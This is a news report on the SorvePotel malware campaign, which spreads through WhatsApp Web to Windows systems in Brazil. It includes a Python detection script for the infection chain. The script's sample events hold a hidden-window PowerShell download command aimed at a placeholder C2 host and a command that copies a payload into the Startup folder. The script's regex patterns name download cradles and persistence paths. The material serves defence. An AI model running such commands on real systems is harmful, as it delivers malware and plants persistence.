SorvePotel Malware Campaign Targets Brazilian WhatsApp Users, Spreads Through Windows Systems
A new malware campaign dubbed SorvePotel is rapidly spreading among WhatsApp users in Brazil, leveraging the messaging platform to infect Windows systems. Unlike typical cyberattacks focused on data theft or ransomware, this malware prioritizes rapid dissemination, according to recent reports.
The campaign utilizes convincing phishing messages containing malicious ZIP file attachments. These messages originate from compromised WhatsApp contacts, lending a deceptive air of credibility. A key indicator suggests the attackers are primarily targeting businesses rather than individual users, as the attachments are designed to be opened on desktop computers.
Once a user opens the attachment, a Windows shortcut (.LNK file) executes a PowerShell script. This script downloads the core malware payload from an external server and registers it to run automatically at each system startup. The malware's central function is the abuse of WhatsApp's web interface: upon detecting an active WhatsApp Web session, SorvePotel automatically sends the malicious ZIP file to every contact and group associated with the compromised account.
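The infection chain above (shortcut launch, PowerShell download, startup persistence) can be turned into host-level detection logic. The following is an added example written for this article, not code from the campaign report: it runs a few chain-link rules over constructed process-creation records in the shape a Sysmon-style sensor export would give once parsed, and reports hosts where several links appear together. Field names, the `WS-0x` host names and the `EXAMPLE-C2-PLACEHOLDER` URL are assumptions.

```python
import re
from dataclasses import dataclass

# Hypothetical parsed process-creation record (field names assumed, not a real sensor schema).
@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str

# One rule per link of the chain described in the article. An explorer.exe parent for
# PowerShell (what a double-clicked .LNK produces) is a weak signal on its own, so
# triage() only reports hosts where more than one link is observed.
RULES = {
    "lnk_launch": lambda e: e.parent_image.lower().endswith("explorer.exe")
        and e.image.lower().endswith("powershell.exe"),
    "hidden_window": lambda e: re.search(r"-w(indowstyle)?\s+hidden", e.command_line, re.I) is not None,
    "download_cradle": lambda e: re.search(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b",
        e.command_line, re.I) is not None,
    "startup_persistence": lambda e: re.search(
        r"\\Start Menu\\Programs\\Startup\\|CurrentVersion\\Run\b", e.command_line, re.I) is not None,
}

def match_rules(event):
    """Return the names of every chain-link rule this single event satisfies."""
    return [name for name, check in RULES.items() if check(event)]

def triage(events, min_hits=2):
    """Aggregate rule hits per host; report hosts with at least min_hits distinct links."""
    per_host = {}
    for e in events:
        hits = match_rules(e)
        if hits:
            per_host.setdefault(e.host, set()).update(hits)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_hits}

# Constructed sample events: WS-01 shows the full chain, WS-02 and WS-03 are benign noise.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    ProcEvent("WS-01", r"C:\Windows\explorer.exe", PS,
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://EXAMPLE-C2-PLACEHOLDER/payload.zip', $env:TEMP+'\\p.zip')\""),
    ProcEvent("WS-01", PS, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c copy %TEMP%\\p.exe \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\""),
    ProcEvent("WS-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcEvent("WS-03", r"C:\Program Files\VSCode\Code.exe", PS, "powershell.exe -c Get-ChildItem"),
]

if __name__ == "__main__":
    print(triage(SAMPLE))  # → {'WS-01': ['download_cradle', 'hidden_window', 'lnk_launch', 'startup_persistence']}
```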
The consequences of infection are significant, with numerous accounts being blocked due to violations of WhatsApp’s terms of service. As of the latest data, the vast majority of infections – 457 out of 477 cases – have been concentrated in Brazil, impacting a diverse range of sectors including government agencies, public services, manufacturing, technology companies, educational institutions, and the construction industry. This campaign underscores a growing trend of cybercriminals exploiting popular communication platforms to spread malware with minimal user interaction.
“This is a concerning development, as it demonstrates how easily malware can propagate through trusted networks like WhatsApp,” noted one cybersecurity analyst. “The focus on spreading, rather than immediate financial gain, suggests a potentially larger, more coordinated operation.”
The self-spreading nature of SorvePotel presents a unique challenge for cybersecurity professionals, requiring a proactive and multi-layered defense strategy. Users are urged to exercise extreme caution when receiving unexpected files from contacts, even those they know, and to verify the legitimacy of any attachments before opening them. This incident serves as a stark reminder of the evolving threat landscape and the importance of maintaining robust cybersecurity practices.
